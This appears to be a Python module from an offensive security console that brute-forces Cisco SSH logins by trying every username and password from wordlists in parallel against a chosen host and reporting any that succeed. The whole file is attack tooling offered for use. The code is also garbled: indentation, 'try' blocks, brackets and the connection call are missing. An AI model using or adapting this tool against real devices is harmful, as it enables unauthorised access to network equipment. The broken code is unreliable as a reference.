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Created April 7, 2021 23:26
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import asyncio
import netmiko
import socket
import concurrent.futures
from pathlib import Path
from paramiko.ssh_exception import SSHException
from src.core.base.BaseModule import BaseModule
from src.core.registry.ModuleRegistry import ModuleRegistry
from src.core.registry.OptionRegistry import OptionRegistry
from prompt_toolkit.shortcuts import PromptSession
from prompt_toolkit.styles import Style
prompt_style = Style.from_dict({"prompt": "ansired bold"})
class SSHModule(BaseModule):
helper = {
'name': 'ssh_bf',
'help': 'This module will attempt to bruteforce Cisco SSH login credentials',
'usage': 'use ssh_bf'
options = {
'module': {
'host': [
'The IPv4 Address of the Cisco SSH service',
'port': [
'The port number of the Cisco SSH service',
'user_list': [
'The username or list containing user names to attempt',
'pass_list': [
'The password or list containing passwords to attempt',
'workers': [
'The number of workers to run in parallel',
def __init__(self, command: str, print_queue: asyncio.Queue, console: object):
self.command: str = command
self.console: object = console
self.print_queue: asyncio.Queue = print_queue
self.module_register: ModuleRegistry = ModuleRegistry()
self.option_register: OptionRegistry = OptionRegistry()
self.work_queue: asyncio.Queue = asyncio.Queue()
self.found = False
self.found_credentials: tuple = ()
async def main(self) -> None:
await self.register()
await self.module_shell()
def return_list_from_file(filename: str) -> list:
if filename == '':
return []
return [x.rstrip() for x in open(filename, encoding='utf8')] if Path(filename).is_file() else [filename]
async def register(self) -> None:
async def module_shell(self) -> None:
session = PromptSession()
allowed_commands = ['set', 'options', 'run', 'back']
while True:
prompt_text = self.option_register.get_register_value('prompt')
sub_prompt = f"{prompt_text} [{self.helper['name']}]> "
data: str = await session.prompt_async(sub_prompt, style=prompt_style)
if not data or not data.startswith(tuple(allowed_commands)):
if data.startswith(tuple(['back', 'exit'])):
raise EOFError
if data.startswith(tuple(['set', 'options'])):
# noinspection PyUnresolvedReferences
await self.console.command_interpreter(data)
if data.startswith(tuple(['run', 'exploit'])):
await asyncio.create_task(self.execute())
# asyncio.create_task(self.execute())
except (EOFError, KeyboardInterrupt):
await self.unregister()
async def unregister(self) -> None:
options: dict = self.option_register.get_register_dict()
if 'module' in options.keys():
async def execute(self) -> None:
executor = concurrent.futures.ThreadPoolExecutor()
host: str = self.option_register.get_register_value('host')
port: str = self.option_register.get_register_value('port')
user_list: list = self.return_list_from_file(self.option_register.get_register_value('user_list'))
pass_list: list = self.return_list_from_file(self.option_register.get_register_value('pass_list'))
workers: str = self.option_register.get_register_value('workers')
if not all([host, port, user_list, pass_list, workers]):
await self.print_queue.put(('error', f"module requires all options to be complete before starting.\n"))
if not 1 <= int(port) <= 65535:
await self.print_queue.put(('error', f"module port '{port}' is not a valid port number.\n"))
except socket.error:
await self.print_queue.put(('error', f"module hostname '{host}' is not valid or could not be resolved.\n"))
for user in user_list:
for password in pass_list:
await self.work_queue.put((user, password))
device: dict = {
'host': host,
'port': port,
'device_type': 'cisco_ios'
loop = asyncio.get_running_loop()
blocking_io = [loop.run_in_executor(executor, self.blocking_io, device, i) for i in range(int(workers))]
completed, pending = await asyncio.wait(blocking_io)
_ = [t.result() for t in completed]
if self.found:
username, password = self.found_credentials
self.print_queue.put_nowait(f"\n[Found Credentials] - Username: {username}\tPassword: {password}\n")
def blocking_io(self, device: dict, wid: int):
while self.work_queue.empty() is not True:
username, password = self.work_queue.get_nowait()
self.print_queue.put_nowait(f'[Worker {wid}] - Trying {username} and {password}')
while not self.found:
device.update({'username': username, 'password': password})
self.print_queue.put_nowait(f"\n==> The credentials {username} - {password} were successful!\n")
self.found_credentials = (username, password)
self.found = True
except asyncio.queues.QueueEmpty:
print("queue empty")
except netmiko.NetmikoAuthenticationException:
except netmiko.NetMikoTimeoutException:
self.print_queue.put_nowait(('error', f"SSH connection timed out"))
except EOFError:
except SSHException as e:
if "reading ssh protocol banner" in e.__str__().lower():
except socket.error:
except Exception as e:
if "reading ssh protocol banner" in e.__str__().lower():
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